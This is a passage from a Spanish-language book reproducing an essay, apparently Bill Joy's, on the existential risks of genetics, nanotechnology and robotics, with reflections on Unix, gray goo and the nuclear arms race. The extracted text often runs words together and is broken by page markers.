En The Agony and the Ecstasy, lanovela biográfica de Irving Stone sobreMiguel Ángel, Stone describe vivamentecómo Miguel Ángel sacaba las estatuasde la piedra, rompiendo el hechizo delmármol, esculpiendo con las imágenesde su mente.[109] En mis momentos demayor éxtasis, el software en lacomputadora se me aparecía de lamisma manera. Una vez que me lo habíaimaginado, yo sentía que ya estaba ahídentro, en la computadora, esperando aser liberado. Pasar la noche despiertoera un precio pequeño por liberarlo por

Page 644: Internet, hackers y software li   varios

darles forma concreta a las ideas.Después de unos años en Berkeley

empecé a entregar algo del software quehabía estado escribiendo un sistemainstructivo de Pascal, utilitarios de Unix,un editor de texto llamado vi (quetodavía es ampliamente usado, aunquesuene raro, más de 20 años después) aotros que tenían minicomputadorassimilares, PDP-11 y VAX. Estasaventuras de software eventualmente seconvirtieron en la versión de Berkeleydel sistema operativo Unix, que seconvirtió en un «éxito-desastre»personal lo quería tanta gente que nuncaterminé el doctorado. En cambio

Page 645: Internet, hackers y software li   varios

conseguí empleo trabajando para Darpa,poniendo el Berkeley Unix en Internet yarreglándolo para que fuera confiable ypudiera correr bien programas pesadospara investigación. Todo esto eradivertido y muy gratificante. Y,sinceramente, no ví robots por ahí, o enningún lugar de los alrededores.

Igualmente, al empezar los ‘80, meestaba ahogando. Las entregas sucesivasde Unix eran muy exitosas, y miproyecto personal consiguió dinero yalgunos ayudantes, pero el problema enBerkeley era siempre el espacio de laoficina, más que el dinero no se contabacon el lugar que necesitaba el proyecto,

Page 646: Internet, hackers y software li   varios

así que cuando aparecieron los otrosfundadores de Sun Microsystems meabalancé para unirme a ellos. En Sun,las largas horas siguieron en los días enque aparecían las primeras estacionesde trabajo y las computadoraspersonales, y he disfrutado de participaren la creación de microprocesadoresavanzados y tecnologías de Internetcomo Java y Jini.

De todo esto, pienso que queda claroque no soy un luddita. Por el contrario,siempre estuve convencido del valor dela investigación científica de la verdad yde la capacidad de la buena ingenieríapara aportar progreso material. La

Page 647: Internet, hackers y software li   varios

Revolución Industrial ha mejoradoincalculablemente la vida de todos a lolargo del último par de siglos, y siempreesperé que mi carrera participara en lacreación de soluciones valiosas paraproblemas reales, un problema a la vez.

No he sido defraudado. Mi trabajoha tenido más impacto del que hubierasoñado y ha sido usado másampliamente de lo que hubieraesperado. He pasado los últimos 20años tratando de descubrir cómo hacerpara que las computadoras sean tanconfiables como quiero que sean (porahora no están ni cerca), y cómo hacerpara que sean fáciles de usar (algo que

Page 648: Internet, hackers y software li   varios

tuvo todavía menos éxito). Pese aalgunos progresos, los problemas quequedan son todavía desafíos másgrandes.

Pero mientras estaba al tanto de losdilemas morales en relación a lasconsecuencias tecnológicas de camposcomo la investigación de armas, noesperaba enfrentarme a estos temas enmi propio campo, o al menos no tanpronto.

A lo mejor lo que pasa es que sueleser difícil ver todo el panorama mientrasestás en medio de los cambios. Nollegar a entender las consecuencias delas invenciones mientras estamos en la

Page 649: Internet, hackers y software li   varios

ola de los descubrimientos y de losavances, parecería ser un error comúnen científicos y tecnólogos; nos hemosdejado llevar desde hace mucho por elsobrecogedor deseo de saber, que esnatural a la aventura científica, sindetenernos a darnos cuenta de que elprogreso hacia nuevas y más poderosastecnologías puede cobrar vida propia.

Me he dado cuenta hace mucho quelos grandes avances de la tecnología dela información vienen no del trabajo decientíficos informáticos, de arquitectosde computadoras o de ingenieroseléctricos sino de investigadores defísica. Los físicos Stephen Wolfram y

Page 650: Internet, hackers y software li   varios

Brosl Hasslacher me introdujeron, enlos tempranos ‘80, a la teoría del caos ya los sistemas nolineales. Aprendíacerca de sistemas complejos deconversaciones con Danny Hillis, elbiólogo Stuart Kauffman, el Nobel deFísica Murray Gell-Mann y otros. Másrecientemente, Hasslacher y el ingenieroeléctrico y físico mecánico Mark Reedhan estado dándome un panorama de lasposibilidades increíbles de laelectrónica molecular.

En mi propio trabajo en el codiseñode tres arquitecturas demicroprocesadores SPARC, picoJAVA,y MAJC, y como diseñador de sucesivas

Page 651: Internet, hackers y software li   varios

implementaciones a partir de éstos, helogrado familiarizarme en profundidad ysin mediaciones con la ley de Moore. Laley de Moore[110] ha predichocorrectamente el índice exponencial demejoramiento de la tecnología desemiconductores. Hasta el año pasadoyo creía que el índice de innovacionespredicho por la ley de Moore podíasostenerse como mucho hasta el 2010,momento en que empezarían aencontrarse limitaciones físicas. No eraobvio para mí que iba a llegar unatecnología nueva justo a tiempo parasostener el ritmo de avance.

Pero debido a avances radicales que

Page 652: Internet, hackers y software li   varios

se dieron recientemente en áreas comola electrónica molecular en donde sereemplazan los transistores dispuestoslitográficamente por átomos y moléculasindividuales, y en el de las tecnologíasde nanoescalas relacionadas a lasanteriores, deberíamos estar preparadospara cumplir o exceder el índice deprogreso de la ley de Moore por otros30 años. Para el 2030, es probable quepodamos construir, en cantidad,máquinas un millón de veces máspoderosas que las computadoraspersonales de hoy en día lo que essuficiente para implementar los sueñosde Kurzweil y Moravec.

Page 653: Internet, hackers y software li   varios

Al combinarse este enorme poderinformático con los avances enmanipulación de las ciencias físicas y elnuevo, y profundo, conocimiento de lagenética, se está desatando un enormepoder transformador. Estascombinaciones abren la oportunidad derediseñar completamente el mundo, paramejor o peor: los procesos dereplicación y evolución que han estadoconfinados al mundo natural están porvolverse reinos del quehacer humano.

Diseñando software ymicroprocesadores, yo nunca habíatenido la sensación de que estabadiseñando una máquina inteligente. El

Page 654: Internet, hackers y software li   varios

software y el hardware son tan frágiles,y la capacidad de las máquinas de«pensar» se muestra tan ausente que,incluso como posibilidad, siempre mepareció muy alejada en el futuro.

Pero ahora, con la perspectiva de unpoder de procesamiento de nivelhumano en unos 30 años, una idea nuevasurge sola: que podría estar trabajandopara crear herramientas que van apermitir la creación de la tecnología quepodría reemplazar a nuestra especie.¿Cómo me siento al respecto? Muyincómodo. Habiendo luchado toda micarrera para construir sistemas desoftware confiables, me parece a mí más

Page 655: Internet, hackers y software li   varios

que probable que este futuro no va afuncionar tan bien como alguna gente seimagina. Mi experiencia personalsugiere que tendemos a sobrevaluarnuestras habilidades para el diseño.

Dado el increíble poder de estastecnologías novedosas, ¿no deberíamosestar preguntándonos cómo podemoscoexistir mejor con ellas? ¿Y si nuestrapropia extinción es contemplable comoposibilidad por las consecuencias denuestro desarrollo tecnológico, nodeberíamos proceder con cuidado?

El sueño de la robótica es, primero,que las máquinas inteligentes puedanhacer el trabajo por nosotros,

Page 656: Internet, hackers y software li   varios

permitiéndonos tener vidas de ocio,devolviéndonos al Edén. Sin embargo,en su historia de estas ideas, Darwingamong the Machines, George Dyson[Reading, Addison Wesley, 1997]advierte: «En el juego de la vida y laevolución hay tres jugadores en lamesa: seres humanos, naturaleza ymáquinas. Estoy firmemente del ladode la naturaleza. Pero la naturaleza,sospecho, está del lado de lasmáquinas». Como hemos visto,Moravec está de acuerdo en la creenciade que podríamos llegar a no sobrevivirluego del encuentro con las especiesrobots superiores.

Page 657: Internet, hackers y software li   varios

¿Qué tan pronto podría serconstruido ese robot inteligente? Losavances anunciados en el poder deprocesamiento de las computadorasparecen hacerlo posible para el 2030. Yuna vez que ya existe un robotinteligente, queda un pequeño paso haciauna especie robot hacia un robotinteligente que puede hacer copiasevolucionadas de sí mismo.

Un segundo sueño de la robótica esque gradualmente nos reemplacemos anosotros mismos con nuestra tecnologíarobótica, consiguiendo una casiinmortalidad mediante la descarga[111]

de nuestras conciencias; es el proceso al

Page 658: Internet, hackers y software li   varios

que Danny Hillis piensa que nos iremosacostumbrando lentamente y que RayKurzweil describe con elegancia en «Laera de las máquinas espirituales».(Estamos empezando a ver acercamientoa este tema en la implantación dedispositivos vinculados a computadorasdentro del cuerpo humano, como semuestra en la portada de Wired defebrero de 2000).

¿Pero si nos descargamos en nuestratecnología, qué posibilidades hay de quedespués del proceso sigamos siendonosotros, o incluso humanos?. Meparece a mí mucho más probable queuna existencia robótica no fuera como

Page 659: Internet, hackers y software li   varios

una humana, de ninguna manera en que laentendemos, que los robots no serían deninguna manera nuestros hijos, que poreste camino nuestra humanidadseguramente se perdería.

La ingeniería genética promete:revolucionar la agriculturaincrementando las producciones detrigo, reduciendo el uso de pesticidas;crear decenas de miles de nuevasespecies de bacterias, plantas, virus yanimales; reemplazar la reproducción, omejorarla, con la clonación; crear curaspara muchas enfermedades,incrementando nuestra expectativa ycalidad de vida; y mucho, mucho más.

Page 660: Internet, hackers y software li   varios

Ahora sabemos con certeza que estosprofundos cambios en las cienciasbiológicas son inminentes y desafiarántodas nuestras nociones de lo que es lavida.

Tecnologías como la clonaciónhumana, en particular, han generadopreocupación por los profundosproblemas éticos y morales a que nosenfrentan. Si, por ejemplo, fuéramos aremodelarnos en varias especiesseparadas y distintas, usando el poderde la ingeniería genética, entoncesdesestabilizaríamos la noción deigualdad que es la piedra fundamental denuestra democracia.

Page 661: Internet, hackers y software li   varios

Dado el increíble poder de laingeniería genética, no es sorprendenteque haya debates de envergadura enrelación a la seguridad de su uso. Miamigo Amory Lovins recientemente co-escribió, junto con Hunter Lovins, unanota de opinión que brinda una miradaecológica en torno a éstos peligros.Entre sus preocupaciones se halla elhecho de que la nueva botánica vinculael desarrollo de las plantas a su éxito,no evolutivo, sino económico.[112] Laextensa carrera de Amory ha estadoorientada a los recursos y la eficienciaenergética a partir de una mirada de«sistema-total» sobre los sistemas

Page 662: Internet, hackers y software li   varios

humanos; esa mirada de sistema-totalmuchas veces encuentra solucionessimples, inteligentes, a lo que de otramanera se convierte en problemastortuosos, y que también se aplica anuestro tema.

Después de leer la nota de Lovins,leí un artículo de Gregg Easterbrook enla página editorial de The New YorkTimes (19 de noviembre de 1999)acerca de los cereales modificados,bajo el título de Comida para elFuturo: Algún día el arroz vendrá conVitamina A ya incorporada. A no serque ganen los Ludditas.

¿Son ludditas Amory y Hunter

Page 663: Internet, hackers y software li   varios

Lovins? Ciertamente no. Creo que todosestamos de acuerdo en que el arrozdorado, con vitamina A incorporada, esalgo bueno, si se desarrolla con cuidadoy respeto por los eventuales peligros demover genes a través de las fronteras delas especies.

La preocupación por los peligrosinherentes a la ingeniería genética estáempezando a aumentar, como lo reflejala nota de Lovins. El público en generalestá al tanto, e incómodo respecto a lascomidas modificadas genéticamente, yparece rechazar la idea de que estascomidas deberían venderse sinidentificarse como tales.

Page 664: Internet, hackers y software li   varios

Pero la tecnología de ingenieríagenética tiene ya mucho tiempo. Comoseñalan los Lovins, el USDA[Departamento de Agricultura de losEstados Unidos] lleva aprobados unos50 cereales genéticamente modificadospara venta libre; más de la mitad de losporotos de soja y un tercio del trigo delmundo contienen hoy genes provenientesde otras formas de vida.

Mientras que hay varios temasimportantes relacionados a esto, mimayor inquietud con respecto a laingeniería genética es más concreta: queda poder —sea militar, accidentalmente,o en un acto terrorista deliberado— de

Page 665: Internet, hackers y software li   varios

crear una Peste Blanca.Las diversas maravillas de la

nanotecnología fueron imaginadas porprimera vez por el ganador del Nobel defísica Richard Feynman en un discursoque dio en 1959, publicado bajo el títulode Hay bastante lugar en el fondo. Ellibro que causó una gran impresión enmí, a mediados de los ‘80, fue Enginesof Creation de Eric Drexler,[113] en elque describía con belleza cómo lamanipulación de materia a un nivelatómico podría crear un futuro utópicode abundancia, donde casi todo podríafabricarse a bajo costo, y casi cualquierenfermedad o problema físico podría

Page 666: Internet, hackers y software li   varios

resolverse usando nanotecnología einteligencia artificial.

Un libro posterior, Unbounding theFuture: The NanotechnologyRevolution,[114] que Drexler co-escribió,imagina algunos de los cambios quepodrían tener lugar en un mundo en quetuviéramos «ensambladores» a nivelmolecular. Los ensambladores podríanhacer posible energía solar a costosbajísimos, curas para el cáncer y elresfrío común por refuerzo del sistemainmunológico humano, limpiezaesencialmente completa delmedioambiente, supercomputadoras debolsillo increíblemente baratas de

Page 667: Internet, hackers y software li   varios

hecho, cualquier producto seríafabricable a un costo no mayor que el dela madera, vuelos al espacio másaccesibles que los vuelostransoceánicos de hoy en día, yrecuperación de especies extinguidas.

Me acuerdo de sentirme muy bienrespecto a la nanotecnología después dehaber leído Engines of Creation. Comotecnólogo, me dio una sensación decalma o sea, la nanotecnología nosmostraba que era posible un progresoincreíble y, de hecho, quizás inevitable.Si la nanotecnología era nuestro futuro,entonces no me sentía presionado aresolver tantos problemas en el

Page 668: Internet, hackers y software li   varios

presente. Llegaría al futuro de Drexleren el tiempo previsto; podía disfrutarmás de la vida aquí y ahora. No teníasentido, dada su visión, quedarsedespierto toda la noche, todo el tiempo.

La visión de Drexler también llevó abastante diversión. Cada tanto me poníaa describir las maravillas de lasnanotecnología a otros que no habíanoído hablar de ellas. Después decansarlos con todas las cosas quedescribía Drexler yo les podía dar unatarea para el hogar inventada por mí:

Usen nanotecnología para crear unvampiro; para mayor puntaje creen unantídoto.

Page 669: Internet, hackers y software li   varios

Con estas maravillas venían clarospeligros, de los cuales estaba al tanto.Como dije en una conferencia sobrenanotecnología en 1989, No podemossimplemente hacer nuestra ciencia y nopreocuparnos por estos temaséticos. [115] Pero mis conversacionesposteriores con físicos me convencieronde que la nanotecnología quizás nisiquiera llegara a funcionar o, por lomenos, no lo haría en los próximostiempos. Poco después me mudé aColorado, a un grupo de estudio quehabía armado, y el foco de mi trabajocambió al software para Internet,específicamente a ideas que se

Page 670: Internet, hackers y software li   varios

convirtieron en Java y Jini.Entonces, el verano pasado, Brosl

Hasslacher me contó que la electrónicamolecular a nanoescalas ya era posible.Éstas eran noticias muy nuevas para mí,y pienso que para mucha gente ycambiaron radicalmente mi opiniónsobre la nanotecnología. Me llevaron denuevo a Engines of Creation. Leyendo ellibro de Drexler después de más de 10años, me shockeó darme cuenta lo pocoque me acordaba de la larga secciónti tulada Peligros y Esperanzas, queincluía una discusión acerca de cómo lasnanotecnologías podían convertirse enmotores de destrucción. De hecho, en

Page 671: Internet, hackers y software li   varios

mi relectura de este material hoy, quedésorprendido por lo naïf que parecenalgunas de las propuestas de seguridadde Drexler, y por lo mucho más grandesque juzgo ahora los peligros de lo queDrexler parecía hacerlo por entonces.(Habiendo anticipado y descrito muchosproblemas técnicos y políticos de lananotecnología, Drexler lanzó elForesight Institute [Instituto para laPrevisión] a fines de los ‘80 «paraayudar a preparar a la sociedad para lasnuevas tecnologías de avanzada» sobretodo, la nanotecnología.)

El salto que permitiría el desarrollode ensambladores parece factible dentro

Page 672: Internet, hackers y software li   varios

de los próximos 20 años. La electrónicamolecular el nuevo subcampo de lananotecnología en el que moléculasindividuales son elementos de loscircuitos debería madurar rápidamente yvolverse enormemente lucrativo a lolargo de esta década, generando un granincremento de inversiones en todas lasnanotecnologías.

Desafortunadamente, como con latecnología nuclear, es más fácil crearusos destructivos para la nanotecnologíaque usos constructivos.

La nanotecnología tiene claros usosmilitares y terroristas, y no se necesitaser suicida para liberar un dispositivo

Page 673: Internet, hackers y software li   varios

nanotecnológico masivamentedestructivo tales dispositivos puedenconstruirse para ser destructivosselectivamente, afectando, por ejemplo,sólo una cierta área geográfica, o ungrupo de personas genéticamentedistintivas.

Una consecuencia inmediata delcontrato faustiano por obtener el granpoder de la nanotecnología, es quecorremos un grave riesgo el riesgo deque podríamos destruir la biosfera de laque depende toda la vida.

Como Drexler explica:

«Plantas» con «hojas» que no

Page 674: Internet, hackers y software li   varios

fueran más eficientes que lascélulas solares de hoy en día,podrían prevalecer sobre lasplantas reales, poblando la biosferade un follaje inédito. Peor todavía,«bacterias» omnívoras podríanprevalecer sobre las bacteriasreales: podrían desparramarsecomo polen por el aire, replicarsetranquilamente, y reducir labiosfera a polvo en cuestión dedías. Algunos replicadorespeligrosos fácilmente podrían serdemasiado resistentes, pequeños, yrápidos en su proliferación, comopara detenerlos por lo menos si no

Page 675: Internet, hackers y software li   varios

nos preparamos. Tenemos bastantesproblemas ya, controlando losvirus y la mosca de la fruta.

Entre los conocedores de lananotecnología, este peligro hapasado a conocerse como elproblema del fango gris. Aunquelas masas de replicadoresdescontrolados no necesiten sergrises o viscosas, fango grisestaría enfatizando que losreplicadores capaces de acabar conla vida podrían ser menosatractivos que cualquier especie depasto común. Podrían sersuperiores en un sentido evolutivo,

Page 676: Internet, hackers y software li   varios

pero esto no los hace más valiososen sí mismos.

La amenaza del fango gris dejaen claro una cosa: no nos podemospermitir cierto tipo de accidentescon ensambladores replicantes.

El fango gris sería sin duda un finaldeprimente para nuestra aventura comohabitantes de la Tierra, mucho peor queel fuego o el agua, y sería un final quepodría salir de un simplelaboratorio.[116]

Más que nada, es el poderdestructivo de la auto-replicación engenética, nanotecnología y robótica

Page 677: Internet, hackers y software li   varios

(GNR) lo que debería obligarnos ahacer una pausa. La auto-replicación esel modus operandi de la ingenieríagenética, que utiliza la maquinaria de lacélula para replicar sus diseños, y es elpeligro más importante subyacente alfango gris en nanotecnología. Historiasde robots renegados como el Borg,replicándose o mutando para escapar delas imposiciones éticas de suscreadores, son bastante comunes ennuestros libros y películas de cienciaficción. Incluso es posible que la auto-replicación sea algo más amplio decomo la pensamos y, por eso, más difícilo incluso imposible de controlar.

Page 678: Internet, hackers y software li   varios

Un artículo reciente de StuartKauffman en Nature titulado Auto-Replicación: hasta los péptidos lohacen analiza el descubrimiento deque 32 peptoaminoácidos pueden auto-catalizar su propia síntesis. Nosabemos hasta qué punto está extendidaesta habilidad, pero Kauffman señalaque podría dar pistas de «una víahacia sistemas moleculares auto-reproductores, con bases mucho másamplias que el base par de Watson-Crick». [117]

En verdad, hemos tenido avisos delos peligros inherentes al conocimientoy difusión de las tecnologías GNR de la

Page 679: Internet, hackers y software li   varios

posibilidad de que el conocimiento porsí mismo diera lugar a una destrucciónmasiva. Pero estos avisos no tuvierondemasiada prensa; los debates públicoshan sido notoriamente inadecuados.Hablar de los peligros no da ganancias.

Las tecnologías nucleares,biológicas y químicas (NBQ) usadas enlas armas de destrucción masiva delsiglo XX eran y son más que nadamilitares, desarrolladas en laboratoriosde gobiernos. En abierto contraste, lastecnologías GNR del siglo XXI tienenusos comerciales manifiestos y estánsiendo desarrolladas casiexclusivamente por empresas

Page 680: Internet, hackers y software li   varios

corporativas. En esta era decomercialismo triunfante, la tecnologíacon la ciencia tomada de la mano estáentregando una serie de invenciones casimágicas, que son de las más lucrativasque se han visto hasta ahora. Estamoslanzados a hacer realidad las promesasde estas nuevas tecnologías dentro deeste sistema, ahora sin competencia, delcapitalismo global y su multiplicidad deincentivos financieros y de presionescompetitivas.

Este es el primer momento en lahistoria de nuestro planeta en queuna especie, por sus propias

Page 681: Internet, hackers y software li   varios

acciones voluntarias, se haconvertido en una amenaza para símisma así como para un vastonúmero de otras. Pudiera ser unproceso esperable, que sucedieraen diversos mundos un planeta,recientemente formado, evolucionaplácidamente en la órbita de suestrella; la vida se formalentamente; emerge la inteligenciaque, al menos hasta ciertomomento, es valiosa para lasupervivencia; y entonces seinventa la tecnología. Se dan cuentade que hay cosas como las leyes dela Naturaleza; de que estas leyes

Page 682: Internet, hackers y software li   varios

pueden revelarse medianteexperimentos, y que elconocimiento de estas leyes puedeusarse tanto para salvar vidas comopara quitarlas, en ambos casos auna escala sin precedentes. Laciencia, reconocen, confierepoderes inmensos. En un instantecrean dispositivos capaces dealterar el mundo. Algunascivilizaciones planetarias se abrendel camino, ponen límites a lo queestaría bien hacer y lo que no, ysiguen protegidas de peligros através del tiempo. Otras, con menossuerte, o menos prudencia, perecen.

Page 683: Internet, hackers y software li   varios

Ese es Carl Sagan, escribiendo en1994, en Pale blue dot, un libro quedescribía su visión del futuro humano enel espacio.[118] Recién ahora estoydándome cuenta de lo profunda que erasu visión, y de la manera en que lo echoy lo echaré de menos. Por su elocuencia,el aporte de Sagan era, sin ser menos, eldel simple sentido común un atributo delque parecen carecer, junto al de lahumildad, muchos de los voceros eimpulsores de las tecnologías del sigloXXI.

Me acuerdo de cuando era chico quemi abuela estaba en contra del usoexcesivo de antibióticos. Había

Page 684: Internet, hackers y software li   varios

trabajado como enfermera desde antesde la Primera Guerra Mundial y tenía lanoción de sentido común de que tomarantibióticos, a menos que fueranabsolutamente necesarios, era malo parauno.

No es que fuera una enemiga delprogreso. Vio muchos progresos a lolargo de casi 70 años como enfermera;mi abuelo, diabético, se beneficióenormemente de las mejoras en lostratamientos que se hicieron posibles alo largo de su vida. Pero ella, comomucha otra gente, pensaría que es unagran arrogancia de nuestra parte estar,ahora, diseñando una «especie robótica

Page 685: Internet, hackers y software li   varios

capaz de reemplazarnos», cuandoobviamente tenemos tantos problemas enhacer que funcionen cosas relativamentesencillas, y tantos problemas paramanejarnos o hasta entendernos anosotros mismos.

Me doy cuenta ahora de que ellatenía una noción o una comprensión delorden natural de la vida, y de lanecesidad de vivir junto a ese orden,respetándolo. Este respeto conlleva unanecesaria humildad de la que nosotros,en nuestra fiebre de comienzos del sigloXXI, carecemos peligrosamente. Lavisión de sentido común, basada en esterespeto, suele tener razón, incluso antes

Page 686: Internet, hackers y software li   varios

de la evidencia científica. La evidentefragilidad e ineficiencias de los sistemashumanos que hemos construido deberíaobligarnos a hacer una pausa;ciertamente la fragilidad de los sistemasen los que he trabajado me ha tornadomás humilde.

Deberíamos haber aprendido unalección de la fabricación de la primerabomba nuclear y de la carreraarmamentística. No actuamos bien esavez, y los paralelismos con nuestrasituación actual son problemáticos. Elesfuerzo por construir la primera bombaatómica fue liderado por el brillantefísico J. Robert Oppenheimer.

Page 687: Internet, hackers y software li   varios

Oppenheimer no estaba interesado en lapolítica pero tomó conciencia de lo quepercibía como una amenaza para lacivilización Occidental proveniente delTercer Reich, una amenaza seguramentegrave debido a la posibilidad de queHitler obtuviera armas nucleares.Motivado por este temor, llevó a LosÁlamos su poderoso intelecto, su pasiónpor la física y su habilidad de lídercarismático, y condujo los esfuerzosrápidos y exitosos de un sorprendentegrupo de brillantes seres para inventarla bomba.

Lo llamativo es cómo el trabajoprosiguió con tanta naturalidad después

Page 688: Internet, hackers y software li   varios

de que hubiera desaparecido el motivoinicial. En una reunión poco después delDía V-E con algunos físicos que sentíanque quizás se debería detener lainvestigación, Oppenheimer argumentóque había que continuar. La razón quedio parece algo extraña: no por temor agrandes bajas en una invasión a Japón,sino porque las Naciones Unidas, queestaban próximas a formarse, debíantener prioridad en el conocimiento delas armas atómicas. Un motivo másprobable por el que debía continuar elproyecto es el punto al que habíallegado la primera prueba atómica,Trinity, estaba casi al alcance de la

Page 689: Internet, hackers y software li   varios

mano.Sabemos que al preparar esta

primera prueba atómica, los físicosprocedieron pese a un gran número deposibles peligros. Se preocuparoninicialmente, en base a cálculosrealizados por Edward Teller, de queuna bomba atómica pudiera incendiar laatmósfera. Un nuevo cálculo redujo elpeligro de destruir el mundo a unaposibilidad de tres en un millón (Tellerdice que luego pudo descartar porcompleto un eventual incendioatmosférico). Oppenheimer, sinembargo, estaba lo suficientementepreocupado por el resultado de Trinity

Page 690: Internet, hackers y software li   varios

como para hacer arreglos para unaposible evacuación de la parte sur oestedel estado de Nuevo México. Y, porsupuesto, estaba el peligro de dispararuna carrera armamentística.

A lo largo del mes siguiente a esaprimera, y exitosa, prueba, dos bombasdestruyeron Hiroshima y Nagasaki.Algunos científicos sugirieron que labomba sólo fuera exhibida, en lugar dearrojarla sobre ciudades japonesasdecían que así se mejorarían lasposibilidades para el control de armasluego de la guerra, pero no se los tuvoen cuenta. Con la tragedia de PearlHarbor fresca todavía en la cabeza de

Page 691: Internet, hackers y software li   varios

los estadounidenses, hubiera sido muydifícil para el Presidente Trumanordenar una demostración de las armasen vez de usarlas como lo hizo el deseode terminar rápidamente con la guerra ysalvar las vidas que se hubieran perdidoen cualquier invasión a Japón erademasiado fuerte. Y sin embargo laverdad era probablemente muy simple:como luego dijo el físico FreemanDyson, La razón por la que se lanzófue que nadie tuvo el coraje o laprevisión de decir no.

Es importante darse cuenta de loshockeados que estuvieron los físicos enlos momentos posteriores a la bomba de

Page 692: Internet, hackers y software li   varios

Hiroshima, el 6 de agosto de 1945.Hablan de varios estados de emoción:primero, satisfacción porque la bombafuncionaba; después horror por todas laspersonas que habían muerto; después elsentimiento convencido de que bajoninguna razón debía arrojarse otrabomba. Sin embargo, por supuesto, otrabomba fue arrojada, en Nagasaki, a sólotres días del bombardeo de Hiroshima.

En noviembre de 1945, tres mesesdespués de los bombardeos con armasatómicas, Oppenheimer se amparó en laactitud científica, diciendo, «No esposible ser científico a menos que secrea en que el conocimiento del mundo,

Page 693: Internet, hackers y software li   varios

y el poder que éste conlleva, es algo devalor intrínseco para la humanidad, yen que uno lo está usando parapromover la difusión del conocimientoy está dispuesto a soportar lasconsecuencias».

Oppenheimer siguió adelantetrabajando, junto a otros, en el informeAcheson-Lilienthal que, como describeRichard Rhodes en su reciente libroVisions of Technology, halló unamanera de prevenir una carreraarmamentística clandestina sin acudira un gobierno mundial equipado conarmas; su recomendación fue algoparecido a entregar el trabajo sobre

Page 694: Internet, hackers y software li   varios

armas nucleares a una agenciainternacional.[119]

Esta propuesta condujo al PlanBaruch, que fue enviado a las NacionesUnidas en junio de 1945, pero que nuncase adoptó (quizás porque, como Rhodessugiere, Bernard Baruch insistió enrecargar el plan de sancionesconvencionales, haciéndolo asíinviable, más allá de que casi conseguridad hubiera sido rechazado porla Rusia estalinista). Otros esfuerzospor promover avances serios hacia unainternacionalización del poder nuclearpara prevenir una carreraarmamentística se detuvieron, ya sea

Page 695: Internet, hackers y software li   varios

ante la falta de acuerdo político y ladesconfianza interna de EE.UU, o ante ladesconfianza de los soviéticos. Laoportunidad de evitar la carreraarmamentística se perdió, y muy rápido.

Dos años después, en 1948,Oppenheimer pareció haber llegado aotra etapa en su pensamiento, diciendoque, en algún sentido muy básicoque ninguna vulgaridad, ni broma, osobreentendido pueden atenuar, losfísicos han conocido el pecado; y estees un saber que no pueden perder.

En 1949 los soviéticos detonaronuna bomba atómica. Para 1955,soviéticos y norteamericanos, ambos,

Page 696: Internet, hackers y software li   varios

habían probado bombas de hidrógenoaptas para ser lanzadas desde un avión.Y entonces empezó la carreraarmamentística.

Hace 20 años, en el documental TheDay After Trinity, Freeman Dysonrepasó las actitudes científicas que nosllevaron al precipicio nuclear:

Lo he sentido yo mismo. Elbrillo seductor de las armasnucleares. Es irresistible si teacercas a ellas como científico.Sentir que está ahí en tus manos,liberar esta energía que alimenta alas estrellas, hacer que siga tus

Page 697: Internet, hackers y software li   varios

planes. Ejecutar estos milagros,elevar un millón de toneladas derocas al cielo. Es algo que le da alas personas una ilusión de poderilimitado, y es, en algún sentido,responsable de todos nuestrosproblemas esto, que podrías llamararrogancia tecnológica, y que seapodera de las personas cuandoven lo que pueden hacer con susmentes.[120]

Ahora, como entonces, somoscreadores de nuevas tecnologías yestrellas del futuro imaginado,impulsados —esta vez por grandes

Page 698: Internet, hackers y software li   varios

recompensas financieras y unacompetencia global— pese a los clarospeligros, evaluando apenas lo que seríaintentar vivir en un mundo que fuera elresultado realista de lo que estamoscreando e imaginando.

En 1947, The Bulletin of the AtomicScientist empezó a poner un Reloj deFin de los Tiempos en su portada. Pormás de 50 años, ha mostrado unaestimación del peligro nuclear relativoque hemos enfrentado, reflejando lasvariaciones de las condicionesinternacionales. Las manecillas del relojse han movido 15 veces y hoy, detenidasa nueve minutos de la medianoche,

Page 699: Internet, hackers y software li   varios

reflejan el peligro real y continuo de lasarmas nucleares. La reciente inclusiónde India y Pakistán en la lista depotencias nucleares ha incrementado laamenaza de fracaso de las metas de noproliferación, y esto se reflejó moviendolas agujas más cerca de la medianocheen 1998.

En nuestro tiempo, ¿a cuánto peligronos enfrentamos, no ya de armasnucleares, sino de todas estastecnologías? ¿Qué tan altos son losriesgos de extinción?

El filósofo John Leslie ha estudiadoel tema y llegó a la conclusión de que elriesgo de extinción humana es al menos

Page 700: Internet, hackers y software li   varios

del 30 por ciento,[121] mientras que RayKurzweil cree que tenemos unachance mejor que nunca de superarnuestros problemas, con la advertenciade que «siempre he sido acusado deoptimista». No sólo no sonalentadoras estas previsiones, sino queno incluyen la probabilidad de muchosresultados terroríficos que acercan laextinción.

Puestas ante estas evaluaciones,algunas personas muy serias ya estánsugiriendo sencillamente dejar la Tierralo más rápido posible. Podríamoscolonizar la galaxia usando los modelosde Von Neumann, que van de sistema a

Page 701: Internet, hackers y software li   varios

sistema solar, replicándose cada vez.Este paso será necesario, ciertamente,en 5 mil millones de años (o antes sinuestro sistema solar recibe demasiadomal el impacto retardado de nuestragalaxia con la galaxia de Andrómeda enlos futuros 3 mil millones de años), perosi leemos literalmente a Kurzweil yMoravec podría ser necesario amediados de este siglo.

¿Cuáles son aquí las implicacionesmorales? Si debemos dejar la Tierra asíde rápido para que la especie puedasobrevivir, ¿quién acepta laresponsabilidad por el destino deaquellos (la mayoría de nosotros,

Page 702: Internet, hackers y software li   varios

después de todo) que sean dejadosatrás? E incluso si nos dispersamos porlas estrellas, ¿no es probable que nosllevemos nuestros problemas connosotros, o que hallemos, luego, que noshan venido siguiendo? El destino denuestra especie en la Tierra y nuestrodestino en la galaxia aparecen ligadosinextricablemente.

Otra idea es erigir una serie deescudos para defendernos ante cada unade las tecnologías peligrosas. LaIniciativa de Defensa Estratégica,propuesta por el gobierno de Reagan,fue un intento de diseñar un escudo deese tipo contra la amenaza de ataque

Page 703: Internet, hackers y software li   varios

nuclear desde la Unión Soviética. PeroArthur C. Clarke que colaboró en ladiscusión del proyecto, observaba:

Aunque sería posible, a un grancosto, construir sistemas de defensalocal que dejarían pasar «solamente»unos bajos porcentajes de mísilesenemigos, la idea más promocionadade un paraguas nacional no teníasentido. Luis Álvarez, quizás el físicoexperimental más importante del siglo,me señaló que los defensores de talespropuestas eran «tipos muyinteligentes sin sentido común».

Clarke seguía: Mirando en mimuy a menudo nubosa bola de cristal,

Page 704: Internet, hackers y software li   varios

sospecho que una defensa total seríaposible en un siglo, más o menos. Perola tecnología involucrada generaría,como subproducto, armas tan terriblesque nadie se molestaría por nada tanprimitivo como mísilesbalísticos. [122]

